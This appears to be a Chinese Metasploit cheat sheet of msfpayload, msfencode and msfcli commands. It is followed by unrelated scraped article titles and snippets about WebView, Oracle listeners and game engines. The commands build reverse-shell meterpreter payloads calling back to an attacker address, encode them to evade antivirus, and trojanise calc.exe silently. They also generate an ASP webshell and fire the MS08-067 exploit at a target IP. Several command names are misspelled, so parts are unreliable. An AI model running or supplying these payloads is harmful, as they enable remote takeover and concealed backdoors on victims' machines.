MSF常用的监听模块命令

msfpayload 命令


帮助

msfpayload -h

列出所有可用的攻击载荷

msfpayload windows/meterpreter/bind_tcp O

列出所有windows/meterperter/bind_tcp 下攻击载荷的配置项(任何攻击载荷都是可以配置的)

msfpayload windows/meterpreter/bind_tcp O.

创建一个meterperter的reverse_tcp攻击载荷,回连到your ip的端口,将其保存为名为payload.exe的windows可执行程序

msfpayload windows/meterperter/reverse_tcp LHOST=your ip LPORT=port X > payload.exe

与上生成同样的攻击载荷,导出成原始格式文件,该文件将后面的MSFencode中使用

msfpayload windows/meterperter/reverse_tcp LHOST=your ip LPORT=port R > payload.raw

与上面生成同样的攻击载荷,但导出成C格式的shellcode

msfpayload windows/meterperter/bind_tcp LPORT=port C > payload.c

导出成以%U编码方式的javascript语言字符串

msfpayload windows/meterperter/bind_tcp LPORT=port J > payload.java

产生webshell将此webshell上传到服务器,这个步骤要有上传权限

msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp

启动msfconsole 输入:

use exploits/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_ip
exploit

msfencode 命令


帮助

msfencode -h

列出所有可用的编码器

msfencode -l

显示编码缓冲区的格式

msfencode -t (c,elf,java,js_Le,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)

使用shikata_ga_nai编码器对payload.raw文件进行5次编码,然后导出一个名为encoded_payload.exe的文件

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

创建一个经过多种编码格式的嵌套编码的攻击载荷

msfpayload windows/meterperter/bind_tcp LPORT=port R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

创建一个纯字母数字的shellcode,由ESI寄存器指向shellcode,以C语言格式输出

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c


msfcli命令


仅列出渗透攻击模块

msfcli|grep exploit

仅列出与windows相关的渗透攻击模块

msfcli|grep exploit/windows

对对方IP发起ms08_067_natapi渗透攻击,配置bind_tcp攻击载荷,并绑定在443端口进行监听

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_ctp LPORT=443 RHOST=对方IP E

metasploit高级忍术


创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.1主机的443端口,使用calc.exe作为载苛后门程序,让载荷执行流一直运行在被攻击的应用程序中,最后生成以.shikata_ga_nai编码器编码后的攻击载荷可执行程序payload.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -k -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.1主机的443端口,使用calc.exe作为载苛后门程序,不让载荷执行流一直运行在被攻击的应用程序中,同时在攻击载荷执行后也不会在目标主机上弹出任何信息,这种配置非常有用,当你通过浏览器漏洞控制了远程主机,并不想让计算器程序打开呈现在目标用户面前。同样,最后生成用.shikata_ga_nai编码器的攻击载荷可执行程序payload.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

创建一个raw格式的bind_tcp模式meterpreter攻击载荷,用.shikata_ga_nai编码7次,输出以payload.exe命名的windows可执行程序文件,同时启用多路监听方式进行执行

msfpayload windows/meterpreter/bind_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E
时间: 2024-10-23 14:32:02

MSF常用的监听模块命令的相关文章

WebView使用详解(二)——WebViewClient与常用事件监听

登录|注册     关闭 启舰 当乌龟有了梦想-- 目录视图 摘要视图 订阅 异步赠书:Kotlin领衔10本好书      免费直播:AI时代,机器学习如何入门?      程序员8月书讯      每周荐书:Java Web.Python极客编程(评论送书) WebView使用详解(二)--WebViewClient与常用事件监听 2016-05-28 11:24 20083人阅读 评论(13) 收藏 举报  分类: 5.andriod开发(148)  版权声明:本文为博主原创文章,未经博主

Oracle 监听lsnrctl命令启动报错(TNS-12537,TNS-12560,TNS-00507)

LINUX登录oracle用户,通过lsnrctl start命令启动数据库时,报错如下: " [[email protected] ~]$ lsnrctl start LSNRCTL for Linux: Version 11.2.0.1.0 - Production on 29-APR-2015 07:38:11 Copyright (c) 1991, 2009, Oracle. All rights reserved. Starting /home/oracle/app/oracle/pr

oracle监听模块异常

一.oracle监听异常 1.检查oracle数据库是否启动:ps -ef | grep ora 2.检查oracle数据库监听程序是否启动:ps -ef | grep LISTEN 3.检查Oracle DB监听器是否正常:lsnrctl status 如未启动,输入:lsnrctl start启动监听器:netstat -ntlp 查看1521端口是否启动 4.进入sqlplus界面:sqlplus /nolog; conn / as sysdba;然后startup启动数据库实例和数据库

Ogre 监听类与渲染流程

Ogre中有许多监听类,我们可以简单理解成C#中的事件,这些类作用都不小,说大点可能改变流程,说小点修改参数等,下面列举一些常用的监听类. FrameListener:由Ogre中的Root负责维护,主要针对所有RenderTarget监听 frameStarted:在一桢开始的时候,所有RenderTarget更新之前. frameRenderingQueued:所有RenderTarget更新之后,但是还没交换缓冲区.(意思屏幕上显示没变) frameEnded:所有RenderTarget

监听服务管理(转)

如果你想管理(启动.关闭等)ORACLE数据库的监听服务,在Windows/Linux平台,你都可以通过lsnrctl命令来实现,下面 我们主要讲一下如何用lsnrctl命令来管理监听服务(我在两台数据库(不同平台.不同版本)分别操作,暂且叫为服务器A. 服务器B): 1:查看服务监听命令的详细帮助信息 服务器A:Red Hat Enterprise Linux Server release 6.0 (Santiago) ORACLE 10 [[email protected] ~]$ lsnr

Swift-属性监听

监听属性的改变(开发中使用很多) oc中长是重写set方法 swift通过属性监听器 class Dog: NSObject { var name:String?{ // 属性监听器 // 属性即将改变监听 willSet{ // print("111") // print(name) print(newValue) } // 属性已经改变监听 // 开发中常用这个监听属性改变 didSet{ // print("222") // print(name) print

android项目 之 来电管家(5) ----- 添加监听服务

上面四节,已经实现了界面设计,黑名单(白名单的添加与删除与黑名单同理,不再赘述),启用监听开关,定时拦截开关,及拦截模式选择等功能,下面就要实现来电管家最核心的功能,也就是拦截功能.   主要思路: 1.  制定拦截模式,这里主要有两个,一个是黑名单模式,也就是只拦截在黑名单中的号码:另一个就是白名单模式,拦截除了白名单以外的号码. 2.  根据用户自定义设置信息,制定正则表达式,判断拦截的标准. 3.  使用对应的类实现挂断电话的功能. 监听模块主要是利用service实现功能,为了实现电话挂

Oracle监听网络服务全面剖析_超越OCP精通Oracle视频教程培训06

课程目标 Oracle视频教程,风哥oracle教程培训学习内容包括,Oracle监听概念与常用配置文件,监听工具与服务测试,oracle监听静态注册与动态注册,配置oracle第二监听,oracle监听与客户端配置,Oracle监听日志配置与日常维护规范,Oracle监听安全与密码管理及防火墙,db_link与进程,如何跟踪问题深入分析等超越oracle认证的数据库教程 适用人群 IT相关从业人员.Oracle数据库技术人员.想加工资的.想升职的都可以. 课程简介 Oracle监听网络服务全面

【COCOS CREATOR 系列教程之二】脚本开发篇&事件监听、常用函数等示例整合

[Cocos Creator ](千人群):  432818031 上一篇,介绍了Himi在使用过cc所有组件后的一篇总结,没有具体介绍每个组件的原因在于官方文档很齐全,而且也有视频的介绍. 所以希望童鞋们可以把我这两篇博文当成对组件.脚本两部分开发的整理与总结. 后续的文章,Himi应该主要更新一些官方还未补充或者还没有的教程.避免无用功. 下面直接放出代码,因为不是很难理解.所以不再一一赘述,都是常用的函数.事件监听.动作回调.定时器等开发过程中必接触的. 大致内容如下: cc 属性介绍 获